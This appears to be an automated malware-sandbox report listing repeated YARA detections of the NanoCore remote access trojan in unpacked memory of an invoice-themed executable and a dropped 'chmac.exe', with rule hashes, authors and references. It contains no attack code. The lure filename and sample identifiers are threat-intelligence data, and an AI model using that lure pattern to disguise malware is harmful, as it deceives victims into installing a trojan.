Source: 3.0.G2M8C76V_INV0ICE_RECEIPT.exe.400000.5.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 3.0.G2M8C76V_INV0ICE_RECEIPT.exe.400000.5.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 3.0.G2M8C76V_INV0ICE_RECEIPT.exe.400000.5.unpack, type: UNPACKEDPE	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 16.0.chmac.exe.400000.5.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 16.0.chmac.exe.400000.5.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 16.0.chmac.exe.400000.5.unpack, type: UNPACKEDPE	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 16.1.chmac.exe.415058.1.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 16.1.chmac.exe.415058.1.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 16.1.chmac.exe.415058.1.unpack, type: UNPACKEDPE	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 14.2.chmac.exe.37b0e54.8.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 14.2.chmac.exe.37b0e54.8.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 16.2.chmac.exe.658288.2.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 16.2.chmac.exe.658288.2.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 16.2.chmac.exe.658288.2.raw.unpack, type: UNPACKEDPE	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 3.0.G2M8C76V_INV0ICE_RECEIPT.exe.415058.9.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 3.0.G2M8C76V_INV0ICE_RECEIPT.exe.415058.9.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 3.0.G2M8C76V_INV0ICE_RECEIPT.exe.415058.9.raw.unpack, type: UNPACKEDPE	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 3.1.G2M8C76V_INV0ICE_RECEIPT.exe.415058.1.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 3.1.G2M8C76V_INV0ICE_RECEIPT.exe.415058.1.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 3.1.G2M8C76V_INV0ICE_RECEIPT.exe.415058.1.unpack, type: UNPACKEDPE	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 16.2.chmac.exe.24b0000.3.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 16.2.chmac.exe.24b0000.3.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 16.2.chmac.exe.24b0000.3.raw.unpack, type: UNPACKEDPE	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 14.0.chmac.exe.415058.7.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 14.0.chmac.exe.415058.7.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 14.0.chmac.exe.415058.7.unpack, type: UNPACKEDPE	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 16.0.chmac.exe.400000.1.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 16.0.chmac.exe.400000.1.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 16.0.chmac.exe.400000.1.unpack, type: UNPACKEDPE	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 14.2.chmac.exe.50a9b8.2.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 14.2.chmac.exe.50a9b8.2.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 14.2.chmac.exe.50a9b8.2.raw.unpack, type: UNPACKEDPE	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 16.0.chmac.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 16.0.chmac.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 16.0.chmac.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 16.2.chmac.exe.658288.2.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 16.2.chmac.exe.658288.2.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 16.2.chmac.exe.658288.2.unpack, type: UNPACKEDPE	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 14.1.chmac.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 14.1.chmac.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 14.1.chmac.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 13.2.chmac.exe.3011458.4.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 13.2.chmac.exe.3011458.4.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 13.2.chmac.exe.3011458.4.raw.unpack, type: UNPACKEDPE	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 14.1.chmac.exe.415058.1.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 14.1.chmac.exe.415058.1.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 14.1.chmac.exe.415058.1.raw.unpack, type: UNPACKEDPE	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 14.2.chmac.exe.2756888.4.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 14.2.chmac.exe.2756888.4.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 16.2.chmac.exe.415058.0.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 16.2.chmac.exe.415058.0.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 16.2.chmac.exe.415058.0.raw.unpack, type: UNPACKEDPE	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 16.1.chmac.exe.415058.1.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 16.1.chmac.exe.415058.1.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 16.1.chmac.exe.415058.1.raw.unpack, type: UNPACKEDPE	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 14.1.chmac.exe.415058.1.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 14.1.chmac.exe.415058.1.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 14.1.chmac.exe.415058.1.unpack, type: UNPACKEDPE	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 3.1.G2M8C76V_INV0ICE_RECEIPT.exe.415058.1.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 3.1.G2M8C76V_INV0ICE_RECEIPT.exe.415058.1.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 3.1.G2M8C76V_INV0ICE_RECEIPT.exe.415058.1.raw.unpack, type: UNPACKEDPE	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 13.2.chmac.exe.3000000.5.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 13.2.chmac.exe.3000000.5.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 13.2.chmac.exe.3000000.5.raw.unpack, type: UNPACKEDPE	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 0.2.G2M8C76V_INV0ICE_RECEIPT.exe.30a0000.5.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 0.2.G2M8C76V_INV0ICE_RECEIPT.exe.30a0000.5.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 0.2.G2M8C76V_INV0ICE_RECEIPT.exe.30a0000.5.raw.unpack, type: UNPACKEDPE	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 3.0.G2M8C76V_INV0ICE_RECEIPT.exe.400000.6.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 3.0.G2M8C76V_INV0ICE_RECEIPT.exe.400000.6.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 3.0.G2M8C76V_INV0ICE_RECEIPT.exe.400000.6.unpack, type: UNPACKEDPE	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 0.2.G2M8C76V_INV0ICE_RECEIPT.exe.30b1458.4.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 0.2.G2M8C76V_INV0ICE_RECEIPT.exe.30b1458.4.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 0.2.G2M8C76V_INV0ICE_RECEIPT.exe.30b1458.4.unpack, type: UNPACKEDPE	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 14.2.chmac.exe.415058.0.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 14.2.chmac.exe.415058.0.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 14.2.chmac.exe.415058.0.raw.unpack, type: UNPACKEDPE	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 15.2.chmac.exe.2540000.4.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 15.2.chmac.exe.2540000.4.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 15.2.chmac.exe.2540000.4.unpack, type: UNPACKEDPE	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 15.2.chmac.exe.2551458.3.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
